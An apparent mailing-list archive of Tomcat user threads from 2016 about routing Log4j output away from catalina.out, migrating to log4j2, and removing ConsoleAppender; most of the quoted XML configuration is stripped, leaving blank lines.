"/log4j-2.xml");


Thanks,


On Wed, Aug 10, 2016 at 11:59 AM, Mark Eggers <its_toas...@yahoo.com.invalid
> wrote:

> Syed,
>
> On 8/9/2016 10:08 PM, Syed Mudassir Ahmed wrote:
> > I am using Log4j in my web app to write the logs to a separate file.
> > Surprisingly, that log file is not at all getting created.  I run
> > the logger logic as a standalone application and the log file indeed
> > gets created.  I am assuming tomcat is not allowing me to write my
> > logs to a file.  It is simply redirecting all the log messages to
> > catalina.out.  Any suggestions on how to direct my logs to a separate
> > file and not to catalina.out.
> >
> > Thanks,
> >
>
> Hmm,
>
> Works for me . . .
>
> 
>'PUBLIC:-//log4j/log4j Configuration//EN'
>   'http://logging.apache.org/log4j/1.2/apidocs/org/apache/log4j/xml/doc-
>   files/log4j.dtd'>
> 
>   
> 
> 
>   
> 
>   
>   
> 
> 
>   
> 
>
> (sorry for the word wrap for the !DOCTYPE line).
>
> Since log4j 1.x was retired in April of 2015, maybe you should move to
> log4j2.
>
> Read the following:
>
> https://logging.apache.org/log4j/2.x/manual/webapp.html
>
> A (more or less) corresponding log4j2.xml file (different app):
>
> 
> 
> 
>  immediateFlush="true"
> fileName="${sys:catalina.base}/logs/logstwo.log"
> filePattern=
>  "${sys:catalina.base}/logs/logstwo-%d{-MM-dd}.log.gz">
> 
> %d %-5p %c.%M:%L - %m%n
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
>
> Note, the log4j2.xml does log rotation, as well as compression of the
> rotated log files. It also logs at a package level one higher than the
> log4j.xml configuration.
>
> The XML file (log4j.xml or log4j2.xml) goes into WEB-INF/classes, or in
> a JAR file in WEB-INF/lib.
>
> The appropriate log4j jar files (different between log4j and log4j2) go
> in WEB-INF/lib.
>
> Quite frankly, your question is very broad and without writing a
> tutorial it's difficult to answer.
>
> I suggest reading the following as well:
>
> http://www.catb.org/~esr/faqs/smart-questions.html
>
> . . . just my two cents
> /mde/
>
>

Re: Log4j Issue

[Mark Eggers]

Syed,

On 8/9/2016 10:08 PM, Syed Mudassir Ahmed wrote:
> I am using Log4j in my web app to write the logs to a separate file. 
> Surprisingly, that log file is not at all getting created.  I run
> the logger logic as a standalone application and the log file indeed
> gets created.  I am assuming tomcat is not allowing me to write my
> logs to a file.  It is simply redirecting all the log messages to
> catalina.out.  Any suggestions on how to direct my logs to a separate
> file and not to catalina.out.
> 
> Thanks,
> 

Hmm,

Works for me . . .


http://logging.apache.org/log4j/1.2/apidocs/org/apache/log4j/xml/doc-
  files/log4j.dtd'>

  


  

  
  


  


(sorry for the word wrap for the !DOCTYPE line).

Since log4j 1.x was retired in April of 2015, maybe you should move to
log4j2.

Read the following:

https://logging.apache.org/log4j/2.x/manual/webapp.html

A (more or less) corresponding log4j2.xml file (different app):






%d %-5p %c.%M:%L - %m%n
















Note, the log4j2.xml does log rotation, as well as compression of the
rotated log files. It also logs at a package level one higher than the
log4j.xml configuration.

The XML file (log4j.xml or log4j2.xml) goes into WEB-INF/classes, or in
a JAR file in WEB-INF/lib.

The appropriate log4j jar files (different between log4j and log4j2) go
in WEB-INF/lib.

Quite frankly, your question is very broad and without writing a
tutorial it's difficult to answer.

I suggest reading the following as well:

http://www.catb.org/~esr/faqs/smart-questions.html

. . . just my two cents
/mde/



signature.asc
Description: OpenPGP digital signature

Log4j Issue

[Syed Mudassir Ahmed]

I am using Log4j in my web app to write the logs to a separate file.
Surprisingly, that log file is not at all getting created.  I run the
logger logic as a standalone application and the log file indeed gets
created.  I am assuming tomcat is not allowing me to write my logs to a
file.  It is simply redirecting all the log messages to catalina.out.  Any
suggestions on how to direct my logs to a separate file and not to
catalina.out.

Thanks,

RE: Understanding how to controlling what data is written to log4j appenders

[Joleen Barker]

This is great information to know. Our installations are on AIX boxes
however.

Joleen
On Mar 10, 2016 10:31 PM, "George Stanchev" <gstanc...@serena.com> wrote:

> If you run tomcat via the windows server wrapper, you can
>
> "%TOMCAT_EXE%" //US//%TOMCAT_SERVICE_NAME% --StdOutput
> "%TOMCAT_CONSOLE_LOG%" --StdError "%TOMCAT_CONSOLE_LOG%"
>
> Which will redirect the stderr and stdoout to the corresponding log files
>
> George
>
> -Original Message-
> From: Joleen Barker [mailto:oldenuf2no...@gmail.com]
> Sent: Thursday, March 10, 2016 5:48 PM
> To: Tomcat Users List <users@tomcat.apache.org>
> Subject: Re: Understanding how to controlling what data is written to
> log4j appenders
>
> Thanks for the tips. I have to use the perl program for now to accomplish
> the task for the company but l'll continue to work this for the sake of
> learning and getting this changed through to application.
>
> Joleen
> On Mar 10, 2016 7:42 PM, "Konstantin Kolinko" <knst.koli...@gmail.com>
> wrote:
>
> > 2016-03-11 2:49 GMT+03:00 Joleen Barker <oldenuf2no...@gmail.com>:
> > > I wanted to let you know that I really tried at this and feel the
> > changes I
> > > made should be working and it is a matter of the developer hard
> > > coding
> > the
> > > log messages to go to the stdout/stderr and became lazy as one of
> > > the
> > other
> > > that commented had stated. I opened a ticket with the vendor but I
> > > have
> > no
> > > idea how long it will take. So I went the route of writing a small
> > > perl script to copy the catalina.out file to a file with the same
> > > name and the date and time appended on the file name and then next I
> > > open the existing catalina.out file to clear the contents and then
> > > close it again to start the next day with a clean log file. It isn't
> > > the way I wanted to go but I ran out of time. If the vendor decides
> > > to work with me, it would be great but I have a feeling they will not
> go back and change things.
> > >
> >
> > On the logging page of the FAQ:
> > https://wiki.apache.org/tomcat/FAQ/Logging#Q10
> >
> >
> > By the way,
> > 1) It is possible to run with a debugger and put a breakpoint into
> > java.io.PrintStream.println(String).  I doubt that the PrintStream
> > class is used much anywhere except to implement System.out/System.err.
> > https://wiki.apache.org/tomcat/FAQ/Developing#Debugging
> >
> > 2) It is possible to search the class files for the message text. The
> > classes store it in UTF-8, and jar files are just zip archives.
> >
> >
> > > So are you suggesting to remove the ConsoleAppender from the
> > > log4j.properties that the vendor has in the WEB-INF/classes directory?
> >
> > Yes.
> >
> > The same for Tomcat own log configuration,
> >
> > http://tomcat.apache.org/tomcat-8.0-doc/logging.html#Considerations_fo
> > r_production_usage
> >
> > (Just mentioning for completeness. IIRC you have already reconfigured
> > Tomcat own logging.)
> >
> >
> > Best regards,
> > Konstantin Kolinko
> >
> > -
> > To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
> > For additional commands, e-mail: users-h...@tomcat.apache.org
> >
> >
>

RE: Understanding how to controlling what data is written to log4j appenders

[George Stanchev]

If you run tomcat via the windows server wrapper, you can

"%TOMCAT_EXE%" //US//%TOMCAT_SERVICE_NAME% --StdOutput "%TOMCAT_CONSOLE_LOG%" 
--StdError "%TOMCAT_CONSOLE_LOG%"

Which will redirect the stderr and stdoout to the corresponding log files

George

-Original Message-
From: Joleen Barker [mailto:oldenuf2no...@gmail.com] 
Sent: Thursday, March 10, 2016 5:48 PM
To: Tomcat Users List <users@tomcat.apache.org>
Subject: Re: Understanding how to controlling what data is written to log4j 
appenders

Thanks for the tips. I have to use the perl program for now to accomplish the 
task for the company but l'll continue to work this for the sake of learning 
and getting this changed through to application.

Joleen
On Mar 10, 2016 7:42 PM, "Konstantin Kolinko" <knst.koli...@gmail.com>
wrote:

> 2016-03-11 2:49 GMT+03:00 Joleen Barker <oldenuf2no...@gmail.com>:
> > I wanted to let you know that I really tried at this and feel the
> changes I
> > made should be working and it is a matter of the developer hard 
> > coding
> the
> > log messages to go to the stdout/stderr and became lazy as one of 
> > the
> other
> > that commented had stated. I opened a ticket with the vendor but I 
> > have
> no
> > idea how long it will take. So I went the route of writing a small 
> > perl script to copy the catalina.out file to a file with the same 
> > name and the date and time appended on the file name and then next I 
> > open the existing catalina.out file to clear the contents and then 
> > close it again to start the next day with a clean log file. It isn't 
> > the way I wanted to go but I ran out of time. If the vendor decides 
> > to work with me, it would be great but I have a feeling they will not go 
> > back and change things.
> >
>
> On the logging page of the FAQ:
> https://wiki.apache.org/tomcat/FAQ/Logging#Q10
>
>
> By the way,
> 1) It is possible to run with a debugger and put a breakpoint into 
> java.io.PrintStream.println(String).  I doubt that the PrintStream 
> class is used much anywhere except to implement System.out/System.err.
> https://wiki.apache.org/tomcat/FAQ/Developing#Debugging
>
> 2) It is possible to search the class files for the message text. The 
> classes store it in UTF-8, and jar files are just zip archives.
>
>
> > So are you suggesting to remove the ConsoleAppender from the 
> > log4j.properties that the vendor has in the WEB-INF/classes directory?
>
> Yes.
>
> The same for Tomcat own log configuration,
>
> http://tomcat.apache.org/tomcat-8.0-doc/logging.html#Considerations_fo
> r_production_usage
>
> (Just mentioning for completeness. IIRC you have already reconfigured 
> Tomcat own logging.)
>
>
> Best regards,
> Konstantin Kolinko
>
> -
> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
> For additional commands, e-mail: users-h...@tomcat.apache.org
>
>

Re: Understanding how to controlling what data is written to log4j appenders

[Joleen Barker]

Thanks for the tips. I have to use the perl program for now to accomplish
the task for the company but l'll continue to work this for the sake of
learning and getting this changed through to application.

Joleen
On Mar 10, 2016 7:42 PM, "Konstantin Kolinko" 
wrote:

> 2016-03-11 2:49 GMT+03:00 Joleen Barker :
> > I wanted to let you know that I really tried at this and feel the
> changes I
> > made should be working and it is a matter of the developer hard coding
> the
> > log messages to go to the stdout/stderr and became lazy as one of the
> other
> > that commented had stated. I opened a ticket with the vendor but I have
> no
> > idea how long it will take. So I went the route of writing a small perl
> > script to copy the catalina.out file to a file with the same name and the
> > date and time appended on the file name and then next I open the existing
> > catalina.out file to clear the contents and then close it again to start
> > the next day with a clean log file. It isn't the way I wanted to go but I
> > ran out of time. If the vendor decides to work with me, it would be great
> > but I have a feeling they will not go back and change things.
> >
>
> On the logging page of the FAQ:
> https://wiki.apache.org/tomcat/FAQ/Logging#Q10
>
>
> By the way,
> 1) It is possible to run with a debugger and put a breakpoint into
> java.io.PrintStream.println(String).  I doubt that the PrintStream
> class is used much anywhere except to implement System.out/System.err.
> https://wiki.apache.org/tomcat/FAQ/Developing#Debugging
>
> 2) It is possible to search the class files for the message text. The
> classes store it in UTF-8, and jar files are just zip archives.
>
>
> > So are you suggesting to remove the ConsoleAppender from the
> > log4j.properties that the vendor has in the WEB-INF/classes directory?
>
> Yes.
>
> The same for Tomcat own log configuration,
>
> http://tomcat.apache.org/tomcat-8.0-doc/logging.html#Considerations_for_production_usage
>
> (Just mentioning for completeness. IIRC you have already reconfigured
> Tomcat own logging.)
>
>
> Best regards,
> Konstantin Kolinko
>
> -
> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
> For additional commands, e-mail: users-h...@tomcat.apache.org
>
>

Re: Understanding how to controlling what data is written to log4j appenders

[Konstantin Kolinko]

2016-03-11 2:49 GMT+03:00 Joleen Barker :
> I wanted to let you know that I really tried at this and feel the changes I
> made should be working and it is a matter of the developer hard coding the
> log messages to go to the stdout/stderr and became lazy as one of the other
> that commented had stated. I opened a ticket with the vendor but I have no
> idea how long it will take. So I went the route of writing a small perl
> script to copy the catalina.out file to a file with the same name and the
> date and time appended on the file name and then next I open the existing
> catalina.out file to clear the contents and then close it again to start
> the next day with a clean log file. It isn't the way I wanted to go but I
> ran out of time. If the vendor decides to work with me, it would be great
> but I have a feeling they will not go back and change things.
>

On the logging page of the FAQ:
https://wiki.apache.org/tomcat/FAQ/Logging#Q10


By the way,
1) It is possible to run with a debugger and put a breakpoint into
java.io.PrintStream.println(String).  I doubt that the PrintStream
class is used much anywhere except to implement System.out/System.err.
https://wiki.apache.org/tomcat/FAQ/Developing#Debugging

2) It is possible to search the class files for the message text. The
classes store it in UTF-8, and jar files are just zip archives.


> So are you suggesting to remove the ConsoleAppender from the
> log4j.properties that the vendor has in the WEB-INF/classes directory?

Yes.

The same for Tomcat own log configuration,
http://tomcat.apache.org/tomcat-8.0-doc/logging.html#Considerations_for_production_usage

(Just mentioning for completeness. IIRC you have already reconfigured
Tomcat own logging.)


Best regards,
Konstantin Kolinko

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: Understanding how to controlling what data is written to log4j appenders

[Joleen Barker]

So are you suggesting to remove the ConsoleAppender from the
log4j.properties that the vendor has in the WEB-INF/classes directory?

Joleen
On Mar 10, 2016 7:17 PM, "Konstantin Kolinko" <knst.koli...@gmail.com>
wrote:

> 2016-03-08 18:43 GMT+03:00 Christopher Schultz <
> ch...@christopherschultz.net>:
> >
> > Everything that says log4j.logger.[something]=[level], stdout
> >
> > Is going to send those log messages to the "stdout" appender, which is
> > tied to System.out. You'll need to do one of two things to dig
> > yourself out:
> >
> > 1. Use swallowOutput="true" on your , which performs some
> > magic to take System.out from applications' calls and redirect it
> > elsewhere else (to the tomcat-defined loggers that can be configured
> > in Tomcat's log4j.properties file).
> >
> > 2. Change the "stdout" appender to be something other than
> > ConsoleAppender, and point it at a file on the disk.
> >
> > I'm not a fan of the first option, but it's sometimes the quickest way
> > to handle everything all at once, and usually doesn't require any
> > changes to the application's configuration.
>
> The swallowOutput option is a remedy for direct System.out.println()
> calls.  One should not expect it to work with something that gets a
> direct reference to System.out stream before Tomcat replaces it.
>
> For example, it Tomcat is reconfigured to use Log4J for its own
> logging, and one configures a ConsoleAppender for Tomcat, this
> ConsoleAppender is not affected by swallowOutput.
>
> The limitations are documented here:
>
> http://tomcat.apache.org/tomcat-8.0-doc/logging.html#Console
>
> If you do not want to log to stdout/stderr, you really must not
> configure any ConsoleAppender,.
>
> Best regards,
> Konstantin Kolinko
>
> -
> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
> For additional commands, e-mail: users-h...@tomcat.apache.org
>
>